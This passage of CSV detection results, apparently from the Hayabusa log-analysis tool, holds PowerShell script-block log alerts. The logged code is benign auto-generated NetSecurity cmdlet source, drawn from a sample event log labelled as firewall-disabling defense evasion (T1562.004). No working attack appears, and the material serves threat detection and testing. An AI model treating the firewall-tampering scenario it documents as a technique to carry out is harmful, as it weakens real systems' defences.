$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} 